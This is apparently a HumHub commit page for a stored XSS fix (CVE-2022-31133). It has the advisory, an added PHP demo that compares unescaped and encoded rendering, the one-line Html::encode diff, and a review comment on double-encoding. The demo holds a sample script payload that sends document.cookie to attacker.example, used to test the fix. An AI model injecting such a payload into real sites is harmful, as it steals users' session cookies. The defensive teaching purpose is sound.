CVE-2022-31133: Fix format of displaying user profile title field on "People" page (#… · humhub/humhub@07d9f8f
HumHub is an open-source enterprise social network. Affected versions of HumHub are vulnerable to stored cross-site scripting (XSS). To exploit it, the attacker needs permission to administer the Spaces feature. The names of individual "spaces" are not properly escaped, so an attacker with that privilege can insert malicious JavaScript into a space name and attack users who visit the space. It is recommended that HumHub be upgraded to 1.11.4 or 1.10.5. There are no known workarounds for this issue.
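The pattern behind this advisory, shown as an added example rather than HumHub's own code: an administrator-controlled name is stored and later interpolated into markup unescaped, and the fix is to HTML-encode it at the output boundary. The `encode()` helper below makes the same `htmlspecialchars()` call that Yii 2's `yii\helpers\Html::encode()` makes internally; the titles, render functions and check are constructed for this example and are not HumHub identifiers.

```php
<?php
// Added example, not HumHub code. Demonstrates the stored XSS the advisory
// describes (unescaped name rendered into a page) beside the hardened form,
// and the double-encoding pitfall of encoding data before the view does.
declare(strict_types=1);

// Constructed sample values: what a privileged user could store as a space
// name or profile field title.
const MALICIOUS_TITLE = 'Dept <script>new Image().src="https://attacker.example/?c="+document.cookie</script>';
const BENIGN_TITLE    = 'Research & Development <Berlin>';

// Same call yii\helpers\Html::encode() performs under the hood (assumption
// stated in the lead-in): quotes, angle brackets and ampersands become entities,
// invalid UTF-8 is replaced instead of dropped.
function encode(string $s, bool $doubleEncode = true): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', $doubleEncode);
}

// Vulnerable: the stored value is concatenated straight into HTML.
function renderFilterVulnerable(string $title): string
{
    return '<label class="profile-filter">' . $title . '</label>';
}

// Fixed: the stored value is encoded where it is written into HTML.
function renderFilterFixed(string $title): string
{
    return '<label class="profile-filter">' . encode($title) . '</label>';
}

// Crude regression check: does an unescaped opening tag survive in the output?
function containsRawTag(string $html, string $tag = 'script'): bool
{
    return stripos($html, '<' . $tag) !== false;
}

function expect(bool $cond, string $what): void
{
    if (!$cond) {
        throw new RuntimeException('check failed: ' . $what);
    }
}

$vuln  = renderFilterVulnerable(MALICIOUS_TITLE);
$fixed = renderFilterFixed(MALICIOUS_TITLE);

expect(containsRawTag($vuln), 'vulnerable render keeps the payload executable');
expect(!containsRawTag($fixed), 'fixed render turns the payload into inert text');

// Double-encoding pitfall: if the title is encoded when the data array is built
// AND the view encodes it again, "&" becomes "&amp;amp;" and users see "&amp;"
// on screen. Passing doubleEncode=false (Html::encode's second argument) leaves
// existing entities untouched, which is one way to make the two layers coexist.
$once  = encode(BENIGN_TITLE);
$twice = encode($once);
expect($twice !== $once, 'naive second encoding mangles an already-encoded title');
expect(encode($once, false) === $once, 'doubleEncode=false is idempotent on encoded input');

echo "vulnerable: {$vuln}\n";
echo "fixed:      {$fixed}\n";
echo "encoded once:  {$once}\n";
echo "encoded twice: {$twice}\n";
```

Run it with `php example.php`; the script throws if either render check fails. The practical rule it illustrates is to encode exactly once, at the point where the value is written into HTML, and to know which layer owns that responsibility so a fix like this one neither leaves a sibling sink unescaped nor double-encodes a harmless title.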
@@ -102,7 +102,7 @@ private function initProfileFieldFilter(ProfileField $profileField, $sortOrder = $fieldType = isset($definition[$profileField->internal_name][‘type’]) ? $definition[$profileField->internal_name][‘type’] : null;
$filterData = [ ‘title’ => Yii::t($profileField->getTranslationCategory(), $profileField->title), ‘title’ => Html::encode(Yii::t($profileField->getTranslationCategory(), $profileField->title)), ‘type’ => $fieldType, ‘sortOrder’ => $sortOrder, ];
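Review bot: the fix encodes the title when `$filterData` is built in `initProfileFieldFilter` rather than where it is rendered, so whatever consumes `$filterData['title']` must now output it raw; if that view (or a widget with label encoding on by default) encodes again, a title such as `R&D` will display as `R&amp;D`. Either confirm the consumer prints the value unencoded, or move `Html::encode()` to the output side and leave the array holding the plain translated string. Encoding after `Yii::t()` is the right order, since the translated text is what reaches the page. Separately, the advisory text above describes unescaped space names, while this hunk only touches the profile field filter title on the People page; please confirm the space name sink is covered by the same release.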